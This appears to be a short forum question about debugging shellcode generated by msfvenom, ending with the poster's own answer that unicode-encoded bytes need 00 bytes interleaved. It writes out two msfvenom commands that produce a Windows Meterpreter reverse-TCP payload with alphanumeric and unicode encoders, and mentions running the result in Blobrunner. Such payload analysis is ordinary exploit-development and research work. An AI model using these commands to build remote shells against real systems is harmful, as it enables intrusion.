I'd like to debug some msfvenom
generated payload.
I'm perfectly able to do it, when I generate the payload with "standard" encoding in this way:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX
In this case, I can get the resulting payload, use something like Blobrunner and I'm ready to go.
If I generate a shellcode with unicode encoding
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX
The same is not working: I get a lot of duplicated/invalid instructions when I process the shellcode. This make sense because I guess I'm managing it as normal encoding. But how can I debug this shellcode? Any tool to convert it to a "valid" sequence removing the "unicode padding"?
Thanks a lot!
I think I got it: it's just a matter of adding an interleave with 00 between bytes...easy...don't know why I missed it before...